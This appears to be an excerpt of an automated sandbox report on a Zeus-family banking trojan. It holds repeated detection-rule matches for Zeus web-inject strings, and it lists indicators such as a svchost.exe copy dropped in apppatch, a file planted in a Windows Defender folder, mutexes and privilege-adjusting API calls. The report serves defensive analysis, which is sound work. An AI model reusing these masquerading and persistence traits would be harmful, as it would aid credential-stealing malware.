    Source: 00000013.00000002.2113815315.0000000002540000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2144870121.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000025.00000002.2196325430.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001D.00000002.2129989380.0000000002E60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001F.00000002.2132321964.0000000001040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2149738925.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.1746712616.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000002.2975747606.0000000002A06000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000013.00000002.2114823849.0000000002910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000019.00000002.2124084846.0000000000890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2145983048.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000021.00000002.2137945302.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2112552802.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2143058636.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2078582889.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000F.00000002.2112522705.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2147384986.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000F.00000002.2112434422.0000000002480000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2150345002.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2145386230.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000027.00000002.2148807567.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000027.00000002.2148506463.0000000001270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000006.00000002.2323493665.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2128505647.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000008.00000002.2334858118.00000000025C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    The rule above matched in each of the following sources:
    Source: 00000015.00000002.2119609866.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: 00000008.00000002.2334780970.0000000002520000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: 00000001.00000003.2079510438.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
    Source: 0000001F.00000002.2132243735.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: 00000021.00000002.2137351546.0000000003150000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
    Source: 00000001.00000003.2150022133.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: 00000001.00000003.2109527836.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: 00000001.00000003.1744603416.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Process Memory Space: 5AFlyarMds.exe PID: 7508, type: MEMORYSTR
    Source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6636, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7092, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6976, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6828, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6708, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6472, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6348, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7136, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7068, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 7000, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6924, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6808, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6788, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6704, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6660, type: MEMORYSTR
    Source: Process Memory Space: cUKxeliGgCix.exe PID: 6556, type: MEMORYSTR
    Source: 5AFlyarMds.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: svchost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engine Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@7/35@2027/24
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: 0_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,0_2_00401E00
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,1_2_00401E00
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CB5930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,1_2_02CB5930
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F85930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_02F85930
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_02575930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_02575930
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025E5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,8_2_025E5930
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: 0_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401CF0
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: 0_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,VirtualAllocEx,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402680
    Source: C:\Windows\apppatch\svchost.exe File created: C:\Program Files (x86)\Windows Defender\vocyzit.com
    Source: C:\Windows\apppatch\svchost.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\login[1].htm
    Source: C:\Windows\apppatch\svchost.exe Mutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7092
    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6828
    Source: C:\Windows\apppatch\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\5DD2BD1Da
    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6636
    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6976
    Source: C:\Users\user\Desktop\5AFlyarMds.exe File created: C:\Users\user\AppData\Local\Temp\D4B2.tmp
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 5AFlyarMds.exe String found in binary or memory: -help
    Source: svchost.exe String found in binary or memory: -help
    Source: C:\Users\user\Desktop\5AFlyarMds.exe File read: C:\Users\user\Desktop\5AFlyarMds.exe
    Source: unknown Process created: C:\Users\user\Desktop\5AFlyarMds.exe "C:\Users\user\Desktop\5AFlyarMds.exe"
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 804
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 800
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 748
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 760
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Section loaded: apphelp.dll, version.dll, urlmon.dll, winmm.dll, inetcomm.dll, iertutil.dll, srvcli.dll, netutils.dll, msoert2.dll, oleacc.dll, inetres.dll, vmhgfs.dll, netapi32.dll, samcli.dll, sspicli.dll, windows.storage.dll, wldp.dll, mpclient.dll, msasn1.dll, profapi.dll, kernel.appcore.dll, uxtheme.dll, firewallapi.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, fwpolicyiomgr.dll, ntmarta.dll
